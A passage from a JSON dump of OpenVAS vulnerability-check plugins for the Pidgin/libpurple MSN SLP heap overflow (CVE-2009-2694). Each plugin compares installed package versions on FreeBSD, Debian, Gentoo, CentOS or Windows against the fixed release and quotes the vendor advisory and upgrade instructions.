upgrades.\n\nhttp://secunia.com/advisories/36384/\nhttp://www.pidgin.im/news/security/?id=34\nhttp://www.vuxml.org/freebsd/59e7af2d-8db7-11de-883b-001e3300a30d.html\";\ntag_summary = \"The remote host is missing an update to the system\nas announced in the referenced advisory.\";\n\n\n\nif(description)\n{\n script_oid(\"1.3.6.1.4.1.25623.1.0.64784\");\n script_version(\"$Revision: 9350 $\");\n script_tag(name:\"last_modification\", value:\"$Date: 2018-04-06 09:03:33 +0200 (Fri, 06 Apr 2018) $\");\n script_tag(name:\"creation_date\", value:\"2009-09-02 04:58:39 +0200 (Wed, 02 Sep 2009)\");\n script_cve_id(\"CVE-2009-2694\");\n script_tag(name:\"cvss_base\", value:\"10.0\");\n script_tag(name:\"cvss_base_vector\", value:\"AV:N/AC:L/Au:N/C:C/I:C/A:C\");\n script_name(\"FreeBSD Ports: pidgin, libpurple, finch\");\n\n\n\n script_category(ACT_GATHER_INFO);\n\n script_copyright(\"Copyright (c) 2009 E-Soft Inc. http://www.securityspace.com\");\n script_family(\"FreeBSD Local Security Checks\");\n script_dependencies(\"gather-package-list.nasl\");\n script_mandatory_keys(\"ssh/login/freebsdrel\", \"login/SSH/success\");\n script_tag(name : \"insight\" , value : tag_insight);\n script_tag(name : \"solution\" , value : tag_solution);\n script_tag(name : \"summary\" , value : tag_summary);\n script_tag(name:\"qod_type\", value:\"package\");\n script_tag(name:\"solution_type\", value:\"VendorFix\");\n exit(0);\n}\n\n#\n# The script code starts here\n#\n\ninclude(\"pkg-lib-bsd.inc\");\n\ntxt = \"\";\nvuln = 0;\nbver = portver(pkg:\"pidgin\");\nif(!isnull(bver) && revcomp(a:bver, b:\"2.5.9\")<0) {\n txt += 'Package pidgin version ' + bver + ' is installed which is known to be vulnerable.\\n';\n vuln = 1;\n}\nbver = portver(pkg:\"libpurple\");\nif(!isnull(bver) && revcomp(a:bver, b:\"2.5.9\")<0) {\n txt += 'Package libpurple version ' + bver + ' is installed which is known to be vulnerable.\\n';\n vuln = 1;\n}\nbver = portver(pkg:\"finch\");\nif(!isnull(bver) && revcomp(a:bver, b:\"2.5.9\")<0) {\n txt += 'Package finch version ' + bver + ' is installed which is known to be vulnerable.\\n';\n vuln = 1;\n}\n\nif(vuln) {\n security_message(data:string(txt));\n} else if (__pkg_match) {\n exit(99); # Not vulnerable.\n}\n", "cvss": {"score": 10.0, "vector": "AV:NETWORK/AC:LOW/Au:NONE/C:COMPLETE/I:COMPLETE/A:COMPLETE/"}}, {"lastseen": "2017-07-24T12:56:09", "references": [], "pluginID": "64753", "description": "The remote host is missing an update to pidgin\nannounced via advisory DSA 1870-1.", "edition": 2, "reporter": "Copyright (c) 2009 E-Soft Inc. http://www.securityspace.com", "published": "2009-09-02T00:00:00", "title": "Debian Security Advisory DSA 1870-1 (pidgin)", "type": "openvas", "enchantments": {"score": {"vector": "NONE", "value": 7.5}}, "naslFamily": "Debian Local Security Checks", "bulletinFamily": "scanner", "cvelist": ["CVE-2008-2927", "CVE-2009-1376", "CVE-2009-2694"], "modified": "2017-07-07T00:00:00", "href": "http://plugins.openvas.org/nasl.php?oid=64753", "id": "OPENVAS:64753", "sourceData": "# OpenVAS Vulnerability Test\n# $Id: deb_1870_1.nasl 6615 2017-07-07 12:09:52Z cfischer $\n# Description: Auto-generated from advisory DSA 1870-1 (pidgin)\n#\n# Authors:\n# Thomas Reinke <reinke@securityspace.com>\n#\n# Copyright:\n# Copyright (c) 2009 E-Soft Inc. http://www.securityspace.com\n# Text descriptions are largely excerpted from the referenced\n# advisory, and are Copyright (c) the respective author(s)\n#\n# This program is free software; you can redistribute it and/or modify\n# it under the terms of the GNU General Public License version 2,\n# or at your option, GNU General Public License version 3,\n# as published by the Free Software Foundation\n#\n# This program is distributed in the hope that it will be useful,\n# but WITHOUT ANY WARRANTY; without even the implied warranty of\n# MERCHANTABILITY or FITNESS FOR A PARTICULAR PURPOSE. See the\n# GNU General Public License for more details.\n#\n# You should have received a copy of the GNU General Public License\n# along with this program; if not, write to the Free Software\n# Foundation, Inc., 51 Franklin St, Fifth Floor, Boston, MA 02110-1301 USA.\n#\n\ninclude(\"revisions-lib.inc\");\ntag_insight = \"Federico Muttis discovered that libpurple, the shared library that adds\nsupport for various instant messaging networks to the pidgin IM client, is\nvulnerable to a heap-based buffer overflow. This issue exists because of\nan incomplete fix for CVE-2008-2927 and CVE-2009-1376. An attacker can\nexploit this by sending two consecutive SLP packets to a victim via MSN.\n\nThe first packet is used to create an SLP message object with an offset of\nzero, the second packet then contains a crafted offset which hits the\nvulnerable code originally fixed in CVE-2008-2927 and CVE-2009-1376 and\nallows an attacker to execute arbitrary code.\n\nNote: Users with the Allow only the users below setting are not vulnerable\nto this attack. If you can't install the below updates you may want to\nset this via Tools->Privacy.\n\n\nFor the stable distribution (lenny), this problem has been fixed in\nversion 2.4.3-4lenny3.\n\nFor the testing distribution (squeeze), this problem will be fixed soon.\n\nFor the unstable distribution (sid), this problem has been fixed in\nversion 2.5.9-1.\n\nWe recommend that you upgrade your pidgin packages.\";\ntag_summary = \"The remote host is missing an update to pidgin\nannounced via advisory DSA 1870-1.\";\n\ntag_solution = \"https://secure1.securityspace.com/smysecure/catid.html?in=DSA%201870-1\";\n\n\nif(description)\n{\n script_id(64753);\n script_version(\"$Revision: 6615 $\");\n script_tag(name:\"last_modification\", value:\"$Date: 2017-07-07 14:09:52 +0200 (Fri, 07 Jul 2017) $\");\n script_tag(name:\"creation_date\", value:\"2009-09-02 04:58:39 +0200 (Wed, 02 Sep 2009)\");\n script_cve_id(\"CVE-2009-2694\", \"CVE-2008-2927\", \"CVE-2009-1376\");\n script_tag(name:\"cvss_base\", value:\"10.0\");\n script_tag(name:\"cvss_base_vector\", value:\"AV:N/AC:L/Au:N/C:C/I:C/A:C\");\n script_name(\"Debian Security Advisory DSA 1870-1 (pidgin)\");\n\n\n\n script_category(ACT_GATHER_INFO);\n\n script_copyright(\"Copyright (c) 2009 E-Soft Inc. http://www.securityspace.com\");\n script_family(\"Debian Local Security Checks\");\n script_dependencies(\"gather-package-list.nasl\");\n script_mandatory_keys(\"ssh/login/debian_linux\", \"ssh/login/packages\");\n script_tag(name : \"solution\" , value : tag_solution);\n script_tag(name : \"insight\" , value : tag_insight);\n script_tag(name : \"summary\" , value : tag_summary);\n script_tag(name:\"qod_type\", value:\"package\");\n script_tag(name:\"solution_type\", value:\"VendorFix\");\n exit(0);\n}\n\n#\n# The script code starts here\n#\n\ninclude(\"pkg-lib-deb.inc\");\n\nres = \"\";\nreport = \"\";\nif ((res = isdpkgvuln(pkg:\"libpurple-bin\", ver:\"2.4.3-4lenny3\", rls:\"DEB5.0\")) != NULL) {\n report += res;\n}\nif ((res = isdpkgvuln(pkg:\"pidgin-data\", ver:\"2.4.3-4lenny3\", rls:\"DEB5.0\")) != NULL) {\n report += res;\n}\nif ((res = isdpkgvuln(pkg:\"libpurple-dev\", ver:\"2.4.3-4lenny3\", rls:\"DEB5.0\")) != NULL) {\n report += res;\n}\nif ((res = isdpkgvuln(pkg:\"pidgin-dev\", ver:\"2.4.3-4lenny3\", rls:\"DEB5.0\")) != NULL) {\n report += res;\n}\nif ((res = isdpkgvuln(pkg:\"finch-dev\", ver:\"2.4.3-4lenny3\", rls:\"DEB5.0\")) != NULL) {\n report += res;\n}\nif ((res = isdpkgvuln(pkg:\"finch\", ver:\"2.4.3-4lenny3\", rls:\"DEB5.0\")) != NULL) {\n report += res;\n}\nif ((res = isdpkgvuln(pkg:\"pidgin\", ver:\"2.4.3-4lenny3\", rls:\"DEB5.0\")) != NULL) {\n report += res;\n}\nif ((res = isdpkgvuln(pkg:\"pidgin-dbg\", ver:\"2.4.3-4lenny3\", rls:\"DEB5.0\")) != NULL) {\n report += res;\n}\nif ((res = isdpkgvuln(pkg:\"libpurple0\", ver:\"2.4.3-4lenny3\", rls:\"DEB5.0\")) != NULL) {\n report += res;\n}\n\nif (report != \"\") {\n security_message(data:report);\n} else if (__pkg_match) {\n exit(99); # Not vulnerable.\n}\n", "cvss": {"score": 10.0, "vector": "AV:NETWORK/AC:LOW/Au:NONE/C:COMPLETE/I:COMPLETE/A:COMPLETE/"}}, {"lastseen": "2018-04-06T11:37:36", "references": [], "pluginID": "136141256231064753", "description": "The remote host is missing an update to pidgin\nannounced via advisory DSA 1870-1.", "edition": 1, "reporter": "Copyright (c) 2009 E-Soft Inc. http://www.securityspace.com", "published": "2009-09-02T00:00:00", "title": "Debian Security Advisory DSA 1870-1 (pidgin)", "type": "openvas", "enchantments": {"score": {"vector": "NONE", "value": 7.5}}, "naslFamily": "Debian Local Security Checks", "bulletinFamily": "scanner", "cvelist": ["CVE-2008-2927", "CVE-2009-1376", "CVE-2009-2694"], "modified": "2018-04-06T00:00:00", "href": "http://plugins.openvas.org/nasl.php?oid=136141256231064753", "id": "OPENVAS:136141256231064753", "sourceData": "# OpenVAS Vulnerability Test\n# $Id: deb_1870_1.nasl 9350 2018-04-06 07:03:33Z cfischer $\n# Description: Auto-generated from advisory DSA 1870-1 (pidgin)\n#\n# Authors:\n# Thomas Reinke <reinke@securityspace.com>\n#\n# Copyright:\n# Copyright (c) 2009 E-Soft Inc. http://www.securityspace.com\n# Text descriptions are largely excerpted from the referenced\n# advisory, and are Copyright (c) the respective author(s)\n#\n# This program is free software; you can redistribute it and/or modify\n# it under the terms of the GNU General Public License version 2,\n# or at your option, GNU General Public License version 3,\n# as published by the Free Software Foundation\n#\n# This program is distributed in the hope that it will be useful,\n# but WITHOUT ANY WARRANTY; without even the implied warranty of\n# MERCHANTABILITY or FITNESS FOR A PARTICULAR PURPOSE. See the\n# GNU General Public License for more details.\n#\n# You should have received a copy of the GNU General Public License\n# along with this program; if not, write to the Free Software\n# Foundation, Inc., 51 Franklin St, Fifth Floor, Boston, MA 02110-1301 USA.\n#\n\ninclude(\"revisions-lib.inc\");\ntag_insight = \"Federico Muttis discovered that libpurple, the shared library that adds\nsupport for various instant messaging networks to the pidgin IM client, is\nvulnerable to a heap-based buffer overflow. This issue exists because of\nan incomplete fix for CVE-2008-2927 and CVE-2009-1376. An attacker can\nexploit this by sending two consecutive SLP packets to a victim via MSN.\n\nThe first packet is used to create an SLP message object with an offset of\nzero, the second packet then contains a crafted offset which hits the\nvulnerable code originally fixed in CVE-2008-2927 and CVE-2009-1376 and\nallows an attacker to execute arbitrary code.\n\nNote: Users with the Allow only the users below setting are not vulnerable\nto this attack. If you can't install the below updates you may want to\nset this via Tools->Privacy.\n\n\nFor the stable distribution (lenny), this problem has been fixed in\nversion 2.4.3-4lenny3.\n\nFor the testing distribution (squeeze), this problem will be fixed soon.\n\nFor the unstable distribution (sid), this problem has been fixed in\nversion 2.5.9-1.\n\nWe recommend that you upgrade your pidgin packages.\";\ntag_summary = \"The remote host is missing an update to pidgin\nannounced via advisory DSA 1870-1.\";\n\ntag_solution = \"https://secure1.securityspace.com/smysecure/catid.html?in=DSA%201870-1\";\n\n\nif(description)\n{\n script_oid(\"1.3.6.1.4.1.25623.1.0.64753\");\n script_version(\"$Revision: 9350 $\");\n script_tag(name:\"last_modification\", value:\"$Date: 2018-04-06 09:03:33 +0200 (Fri, 06 Apr 2018) $\");\n script_tag(name:\"creation_date\", value:\"2009-09-02 04:58:39 +0200 (Wed, 02 Sep 2009)\");\n script_cve_id(\"CVE-2009-2694\", \"CVE-2008-2927\", \"CVE-2009-1376\");\n script_tag(name:\"cvss_base\", value:\"10.0\");\n script_tag(name:\"cvss_base_vector\", value:\"AV:N/AC:L/Au:N/C:C/I:C/A:C\");\n script_name(\"Debian Security Advisory DSA 1870-1 (pidgin)\");\n\n\n\n script_category(ACT_GATHER_INFO);\n\n script_copyright(\"Copyright (c) 2009 E-Soft Inc. http://www.securityspace.com\");\n script_family(\"Debian Local Security Checks\");\n script_dependencies(\"gather-package-list.nasl\");\n script_mandatory_keys(\"ssh/login/debian_linux\", \"ssh/login/packages\");\n script_tag(name : \"solution\" , value : tag_solution);\n script_tag(name : \"insight\" , value : tag_insight);\n script_tag(name : \"summary\" , value : tag_summary);\n script_tag(name:\"qod_type\", value:\"package\");\n script_tag(name:\"solution_type\", value:\"VendorFix\");\n exit(0);\n}\n\n#\n# The script code starts here\n#\n\ninclude(\"pkg-lib-deb.inc\");\n\nres = \"\";\nreport = \"\";\nif ((res = isdpkgvuln(pkg:\"libpurple-bin\", ver:\"2.4.3-4lenny3\", rls:\"DEB5.0\")) != NULL) {\n report += res;\n}\nif ((res = isdpkgvuln(pkg:\"pidgin-data\", ver:\"2.4.3-4lenny3\", rls:\"DEB5.0\")) != NULL) {\n report += res;\n}\nif ((res = isdpkgvuln(pkg:\"libpurple-dev\", ver:\"2.4.3-4lenny3\", rls:\"DEB5.0\")) != NULL) {\n report += res;\n}\nif ((res = isdpkgvuln(pkg:\"pidgin-dev\", ver:\"2.4.3-4lenny3\", rls:\"DEB5.0\")) != NULL) {\n report += res;\n}\nif ((res = isdpkgvuln(pkg:\"finch-dev\", ver:\"2.4.3-4lenny3\", rls:\"DEB5.0\")) != NULL) {\n report += res;\n}\nif ((res = isdpkgvuln(pkg:\"finch\", ver:\"2.4.3-4lenny3\", rls:\"DEB5.0\")) != NULL) {\n report += res;\n}\nif ((res = isdpkgvuln(pkg:\"pidgin\", ver:\"2.4.3-4lenny3\", rls:\"DEB5.0\")) != NULL) {\n report += res;\n}\nif ((res = isdpkgvuln(pkg:\"pidgin-dbg\", ver:\"2.4.3-4lenny3\", rls:\"DEB5.0\")) != NULL) {\n report += res;\n}\nif ((res = isdpkgvuln(pkg:\"libpurple0\", ver:\"2.4.3-4lenny3\", rls:\"DEB5.0\")) != NULL) {\n report += res;\n}\n\nif (report != \"\") {\n security_message(data:report);\n} else if (__pkg_match) {\n exit(99); # Not vulnerable.\n}\n", "cvss": {"score": 10.0, "vector": "AV:NETWORK/AC:LOW/Au:NONE/C:COMPLETE/I:COMPLETE/A:COMPLETE/"}}, {"lastseen": "2018-04-06T11:40:35", "references": [], "pluginID": "136141256231066109", "description": "The remote host is missing updates announced in\nadvisory GLSA 200910-02.", "edition": 1, "reporter": "Copyright (c) 2009 E-Soft Inc. http://www.securityspace.com", "published": "2009-10-27T00:00:00", "type": "openvas", "title": "Gentoo Security Advisory GLSA 200910-02 (pidgin)", "enchantments": {"score": {"vector": "NONE", "value": 7.5}}, "naslFamily": "Gentoo Local Security Checks", "bulletinFamily": "scanner", "cvelist": ["CVE-2009-1376", "CVE-2009-3026", "CVE-2009-1889", "CVE-2009-2694"], "modified": "2018-04-06T00:00:00", "href": "http://plugins.openvas.org/nasl.php?oid=136141256231066109", "id": "OPENVAS:136141256231066109", "sourceData": "#\n# OpenVAS Vulnerability Test\n# $\n# Description: Auto generated from Gentoo's XML based advisory\n#\n# Authors:\n# Thomas Reinke <reinke@securityspace.com>\n#\n# Copyright:\n# Copyright (c) 2009 E-Soft Inc. http://www.securityspace.com\n# Text descriptions are largely excerpted from the referenced\n# advisories, and are Copyright (c) the respective author(s)\n#\n# This program is free software; you can redistribute it and/or modify\n# it under the terms of the GNU General Public License version 2,\n# or at your option, GNU General Public License version 3,\n# as published by the Free Software Foundation\n#\n# This program is distributed in the hope that it will be useful,\n# but WITHOUT ANY WARRANTY; without even the implied warranty of\n# MERCHANTABILITY or FITNESS FOR A PARTICULAR PURPOSE. See the\n# GNU General Public License for more details.\n#\n# You should have received a copy of the GNU General Public License\n# along with this program; if not, write to the Free Software\n# Foundation, Inc., 51 Franklin St, Fifth Floor, Boston, MA 02110-1301 USA.\n#\n\ninclude(\"revisions-lib.inc\");\ntag_insight = \"Multiple vulnerabilities have been discovered in Pidgin, leading to the\n remote execution of arbitrary code, unauthorized information\ndisclosure, or\n Denial of Service.\";\ntag_solution = \"All Pidgin users should upgrade to the latest version:\n\n # emerge --sync\n # emerge --ask --oneshot --verbose =net-im/pidgin-2.5.9-r1\n\nhttp://www.securityspace.com/smysecure/catid.html?in=GLSA%20200910-02\nhttp://bugs.gentoo.org/show_bug.cgi?id=276000\nhttp://bugs.gentoo.org/show_bug.cgi?id=281545\nhttp://bugs.gentoo.org/show_bug.cgi?id=283324\nhttp://www.gentoo.org/security/en/glsa/glsa-200905-07.xml\";\ntag_summary = \"The remote host is missing updates announced in\nadvisory GLSA 200910-02.\";\n\n \n \n\nif(description)\n{\n script_oid(\"1.3.6.1.4.1.25623.1.0.66109\");\n script_version(\"$Revision: 9350 $\");\n script_tag(name:\"last_modification\", value:\"$Date: 2018-04-06 09:03:33 +0200 (Fri, 06 Apr 2018) $\");\n script_tag(name:\"creation_date\", value:\"2009-10-27 01:37:56 +0100 (Tue, 27 Oct 2009)\");\n script_cve_id(\"CVE-2009-1376\", \"CVE-2009-1889\", \"CVE-2009-2694\", \"CVE-2009-3026\");\n script_tag(name:\"cvss_base\", value:\"10.0\");\n script_tag(name:\"cvss_base_vector\", value:\"AV:N/AC:L/Au:N/C:C/I:C/A:C\");\n script_name(\"Gentoo Security Advisory GLSA 200910-02 (pidgin)\");\n\n\n\n script_category(ACT_GATHER_INFO);\n\n script_copyright(\"Copyright (c) 2009 E-Soft Inc. http://www.securityspace.com\");\n script_family(\"Gentoo Local Security Checks\");\n script_dependencies(\"gather-package-list.nasl\");\n script_mandatory_keys(\"ssh/login/gentoo\", \"ssh/login/pkg\");\n script_tag(name : \"insight\" , value : tag_insight);\n script_tag(name : \"solution\" , value : tag_solution);\n script_tag(name : \"summary\" , value : tag_summary);\n script_tag(name:\"qod_type\", value:\"package\");\n script_tag(name:\"solution_type\", value:\"VendorFix\");\n exit(0);\n}\n\n#\n# The script code starts here\n#\n\ninclude(\"pkg-lib-gentoo.inc\");\n\nres = \"\";\nreport = \"\";\nif ((res = ispkgvuln(pkg:\"net-im/pidgin\", unaffected: make_list(\"ge 2.5.9-r1\"), vulnerable: make_list(\"lt 2.5.9-r1\"))) != NULL) {\n report += res;\n}\n\nif (report != \"\") {\n security_message(data:report);\n} else if (__pkg_match) {\n exit(99); # Not vulnerable.\n}\n", "cvss": {"score": 10.0, "vector": "AV:NETWORK/AC:LOW/Au:NONE/C:COMPLETE/I:COMPLETE/A:COMPLETE/"}}, {"lastseen": "2017-07-24T12:57:12", "references": [], "pluginID": "66109", "description": "The remote host is missing updates announced in\nadvisory GLSA 200910-02.", "edition": 2, "reporter": "Copyright (c) 2009 E-Soft Inc. http://www.securityspace.com", "published": "2009-10-27T00:00:00", "enchantments": {"score": {"vector": "NONE", "value": 7.5}}, "title": "Gentoo Security Advisory GLSA 200910-02 (pidgin)", "type": "openvas", "naslFamily": "Gentoo Local Security Checks", "bulletinFamily": "scanner", "cvelist": ["CVE-2009-1376", "CVE-2009-3026", "CVE-2009-1889", "CVE-2009-2694"], "modified": "2017-07-07T00:00:00", "href": "http://plugins.openvas.org/nasl.php?oid=66109", "id": "OPENVAS:66109", "sourceData": "#\n# OpenVAS Vulnerability Test\n# $\n# Description: Auto generated from Gentoo's XML based advisory\n#\n# Authors:\n# Thomas Reinke <reinke@securityspace.com>\n#\n# Copyright:\n# Copyright (c) 2009 E-Soft Inc. http://www.securityspace.com\n# Text descriptions are largely excerpted from the referenced\n# advisories, and are Copyright (c) the respective author(s)\n#\n# This program is free software; you can redistribute it and/or modify\n# it under the terms of the GNU General Public License version 2,\n# or at your option, GNU General Public License version 3,\n# as published by the Free Software Foundation\n#\n# This program is distributed in the hope that it will be useful,\n# but WITHOUT ANY WARRANTY; without even the implied warranty of\n# MERCHANTABILITY or FITNESS FOR A PARTICULAR PURPOSE. See the\n# GNU General Public License for more details.\n#\n# You should have received a copy of the GNU General Public License\n# along with this program; if not, write to the Free Software\n# Foundation, Inc., 51 Franklin St, Fifth Floor, Boston, MA 02110-1301 USA.\n#\n\ninclude(\"revisions-lib.inc\");\ntag_insight = \"Multiple vulnerabilities have been discovered in Pidgin, leading to the\n remote execution of arbitrary code, unauthorized information\ndisclosure, or\n Denial of Service.\";\ntag_solution = \"All Pidgin users should upgrade to the latest version:\n\n # emerge --sync\n # emerge --ask --oneshot --verbose =net-im/pidgin-2.5.9-r1\n\nhttp://www.securityspace.com/smysecure/catid.html?in=GLSA%20200910-02\nhttp://bugs.gentoo.org/show_bug.cgi?id=276000\nhttp://bugs.gentoo.org/show_bug.cgi?id=281545\nhttp://bugs.gentoo.org/show_bug.cgi?id=283324\nhttp://www.gentoo.org/security/en/glsa/glsa-200905-07.xml\";\ntag_summary = \"The remote host is missing updates announced in\nadvisory GLSA 200910-02.\";\n\n \n \n\nif(description)\n{\n script_id(66109);\n script_version(\"$Revision: 6595 $\");\n script_tag(name:\"last_modification\", value:\"$Date: 2017-07-07 11:19:55 +0200 (Fri, 07 Jul 2017) $\");\n script_tag(name:\"creation_date\", value:\"2009-10-27 01:37:56 +0100 (Tue, 27 Oct 2009)\");\n script_cve_id(\"CVE-2009-1376\", \"CVE-2009-1889\", \"CVE-2009-2694\", \"CVE-2009-3026\");\n script_tag(name:\"cvss_base\", value:\"10.0\");\n script_tag(name:\"cvss_base_vector\", value:\"AV:N/AC:L/Au:N/C:C/I:C/A:C\");\n script_name(\"Gentoo Security Advisory GLSA 200910-02 (pidgin)\");\n\n\n\n script_category(ACT_GATHER_INFO);\n\n script_copyright(\"Copyright (c) 2009 E-Soft Inc. http://www.securityspace.com\");\n script_family(\"Gentoo Local Security Checks\");\n script_dependencies(\"gather-package-list.nasl\");\n script_mandatory_keys(\"ssh/login/gentoo\", \"ssh/login/pkg\");\n script_tag(name : \"insight\" , value : tag_insight);\n script_tag(name : \"solution\" , value : tag_solution);\n script_tag(name : \"summary\" , value : tag_summary);\n script_tag(name:\"qod_type\", value:\"package\");\n script_tag(name:\"solution_type\", value:\"VendorFix\");\n exit(0);\n}\n\n#\n# The script code starts here\n#\n\ninclude(\"pkg-lib-gentoo.inc\");\n\nres = \"\";\nreport = \"\";\nif ((res = ispkgvuln(pkg:\"net-im/pidgin\", unaffected: make_list(\"ge 2.5.9-r1\"), vulnerable: make_list(\"lt 2.5.9-r1\"))) != NULL) {\n report += res;\n}\n\nif (report != \"\") {\n security_message(data:report);\n} else if (__pkg_match) {\n exit(99); # Not vulnerable.\n}\n", "cvss": {"score": 10.0, "vector": "AV:NETWORK/AC:LOW/Au:NONE/C:COMPLETE/I:COMPLETE/A:COMPLETE/"}}, {"lastseen": "2017-07-02T21:14:17", "references": ["http://secunia.com/advisories/36384", "http://www.vupen.com/english/advisories/2009/2303", "http://www.pidgin.im/news/security/?id=34"], "pluginID": "900919", "description": "This host has Pidgin installed and is prone to Denial of Service\n vulnerability.", "edition": 1, "reporter": "Copyright (C) 2009 SecPod", "published": "2009-08-26T00:00:00", "title": "Pidgin MSN SLP Packets Denial Of Service Vulnerability (Windows)", "type": "openvas", "enchantments": {"score": {"vector": "NONE", "value": 7.5}}, "naslFamily": "Denial of Service", "bulletinFamily": "scanner", "cvelist": ["CVE-2009-2694"], "modified": "2017-01-27T00:00:00", "href": "http://plugins.openvas.org/nasl.php?oid=900919", "id": "OPENVAS:900919", "sourceData": "###############################################################################\n# OpenVAS Vulnerability Test\n# $Id: secpod_pidgin_msnslp_dos_vuln_win.nasl 5122 2017-01-27 12:16:00Z teissa $\n#\n# Pidgin MSN SLP Packets Denial Of Service Vulnerability (Windows)\n#\n# Authors:\n# Nikita MR <rnikita@secpod.com>\n#\n# Copyright:\n# Copyright (c) 2009 SecPod, http://www.secpod.com\n#\n# This program is free software; you can redistribute it and/or modify\n# it under the terms of the GNU General Public License version 2\n# (or any later version), as published by the Free Software Foundation.\n#\n# This program is distributed in the hope that it will be useful,\n# but WITHOUT ANY WARRANTY; without even the implied warranty of\n# MERCHANTABILITY or FITNESS FOR A PARTICULAR PURPOSE. See the\n# GNU General Public License for more details.\n#\n# You should have received a copy of the GNU General Public License\n# along with this program; if not, write to the Free Software\n# Foundation, Inc., 51 Franklin St, Fifth Floor, Boston, MA 02110-1301 USA.\n###############################################################################\n\ntag_impact = \"Attackers can exploit this issue to execute arbitrary code, corrupt memory\n and cause the application to crash.\n Impact Level: Application\";\ntag_affected = \"Pidgin version prior to 2.5.9 on Windows.\";\ntag_insight = \"An error in the 'msn_slplink_process_msg()' function while processing\n malformed MSN SLP packets which can be exploited to overwrite of an\n arbitrary memory location.\";\ntag_solution = \"Upgrade to Pidgin version 2.5.9\n http://pidgin.im/download\";\ntag_summary = \"This host has Pidgin installed and is prone to Denial of Service\n vulnerability.\";\n\nif(description)\n{\n script_id(900919);\n script_version(\"$Revision: 5122 $\");\n script_tag(name:\"last_modification\", value:\"$Date: 2017-01-27 13:16:00 +0100 (Fri, 27 Jan 2017) $\");\n script_tag(name:\"creation_date\", value:\"2009-08-26 14:01:08 +0200 (Wed, 26 Aug 2009)\");\n script_tag(name:\"cvss_base\", value:\"10.0\");\n script_tag(name:\"cvss_base_vector\", value:\"AV:N/AC:L/Au:N/C:C/I:C/A:C\");\n script_cve_id(\"CVE-2009-2694\");\n script_bugtraq_id(36071);\n script_name(\"Pidgin MSN SLP Packets Denial Of Service Vulnerability (Windows)\");\n script_xref(name : \"URL\" , value : \"http://secunia.com/advisories/36384\");\n script_xref(name : \"URL\" , value : \"http://www.pidgin.im/news/security/?id=34\");\n script_xref(name : \"URL\" , value : \"http://www.vupen.com/english/advisories/2009/2303\");\n\n script_category(ACT_GATHER_INFO);\n script_copyright(\"Copyright (C) 2009 SecPod\");\n script_family(\"Denial of Service\");\n script_dependencies(\"secpod_pidgin_detect_win.nasl\");\n script_require_keys(\"Pidgin/Win/Ver\");\n script_tag(name : \"impact\" , value : tag_impact);\n script_tag(name : \"affected\" , value : tag_affected);\n script_tag(name : \"insight\" , value : tag_insight);\n script_tag(name : \"solution\" , value : tag_solution);\n script_tag(name : \"summary\" , value : tag_summary);\n script_tag(name:\"qod_type\", value:\"registry\");\n script_tag(name:\"solution_type\", value:\"VendorFix\");\n exit(0);\n}\n\n\ninclude(\"version_func.inc\");\n\npidginVer = get_kb_item(\"Pidgin/Win/Ver\");\nif(pidginVer != NULL)\n{\n if(version_is_less(version:pidginVer, test_version:\"2.5.9\")){\n security_message(0);\n }\n}\n", "cvss": {"score": 10.0, "vector": "AV:NETWORK/AC:LOW/Au:NONE/C:COMPLETE/I:COMPLETE/A:COMPLETE/"}}, {"lastseen": "2017-07-25T10:56:54", "references": [], "pluginID": "64789", "description": "The remote host is missing updates to pidgin announced in\nadvisory CESA-2009:1218.", "edition": 2, "reporter": "Copyright (c) 2009 E-Soft Inc. http://www.securityspace.com", "published": "2009-09-02T00:00:00", "enchantments": {"score": {"vector": "NONE", "value": 5.0}}, "title": "CentOS Security Advisory CESA-2009:1218 (pidgin)", "type": "openvas", "naslFamily": "CentOS Local Security Checks", "bulletinFamily": "scanner", "cvelist": ["CVE-2009-2694"], "modified": "2017-07-10T00:00:00", "href": "http://plugins.openvas.org/nasl.php?oid=64789", "id": "OPENVAS:64789", "sourceData": "#CESA-2009:1218 64789 4\n# $Id: ovcesa2009_1218.nasl 6650 2017-07-10 11:43:12Z cfischer $\n# Description: Auto-generated from advisory CESA-2009:1218 (pidgin)\n#\n# Authors:\n# Thomas Reinke <reinke@securityspace.com>\n#\n# Copyright:\n# Copyright (c) 2009 E-Soft Inc. http://www.securityspace.com\n#\n# This program is free software; you can redistribute it and/or modify\n# it under the terms of the GNU General Public License version 2,\n# or at your option, GNU General Public License version 3,\n# as published by the Free Software Foundation\n#\n# This program is distributed in the hope that it will be useful,\n# but WITHOUT ANY WARRANTY; without even the implied warranty of\n# MERCHANTABILITY or FITNESS FOR A PARTICULAR PURPOSE. See the\n# GNU General Public License for more details.\n#\n# You should have received a copy of the GNU General Public License\n# along with this program; if not, write to the Free Software\n# Foundation, Inc., 51 Franklin St, Fifth Floor, Boston, MA 02110-1301 USA.\n#\n\ninclude(\"revisions-lib.inc\");\ntag_insight = \"For details on the issues addressed in this update,\nplease visit the referenced security advisories.\";\ntag_solution = \"Update the appropriate packages on your system.\n\nhttp://www.securityspace.com/smysecure/catid.html?in=CESA-2009:1218\nhttp://www.securityspace.com/smysecure/catid.html?in=RHSA-2009:1218\nhttps://rhn.redhat.com/errata/RHSA-2009-1218.html\";\ntag_summary = \"The remote host is missing updates to pidgin announced in\nadvisory CESA-2009:1218.\";\n\n\n\nif(description)\n{\n script_id(64789);\n script_version(\"$Revision: 6650 $\");\n script_tag(name:\"last_modification\", value:\"$Date: 2017-07-10 13:43:12 +0200 (Mon, 10 Jul 2017) $\");\n script_tag(name:\"creation_date\", value:\"2009-09-02 04:58:39 +0200 (Wed, 02 Sep 2009)\");\n script_cve_id(\"CVE-2009-2694\");\n script_tag(name:\"cvss_base\", value:\"10.0\");\n script_tag(name:\"cvss_base_vector\", value:\"AV:N/AC:L/Au:N/C:C/I:C/A:C\");\n script_name(\"CentOS Security Advisory CESA-2009:1218 (pidgin)\");\n\n\n\n script_category(ACT_GATHER_INFO);\n\n script_copyright(\"Copyright (c) 2009 E-Soft Inc. http://www.securityspace.com\");\n script_family(\"CentOS Local Security Checks\");\n script_dependencies(\"gather-package-list.nasl\");\n script_mandatory_keys(\"ssh/login/centos\", \"ssh/login/rpms\");\n script_tag(name : \"insight\" , value : tag_insight);\n script_tag(name : \"solution\" , value : tag_solution);\n script_tag(name : \"summary\" , value : tag_summary);\n script_tag(name:\"qod_type\", value:\"package\");\n script_tag(name:\"solution_type\", value:\"VendorFix\");\n exit(0);\n}\n\n#\n# The script code starts here\n#\n\ninclude(\"pkg-lib-rpm.inc\");\n\nres = \"\";\nreport = \"\";\nif ((res = isrpmvuln(pkg:\"finch\", rpm:\"finch~2.5.9~1.el5\", rls:\"CentOS5\")) != NULL) {\n report += res;\n}\nif ((res = isrpmvuln(pkg:\"finch-devel\", 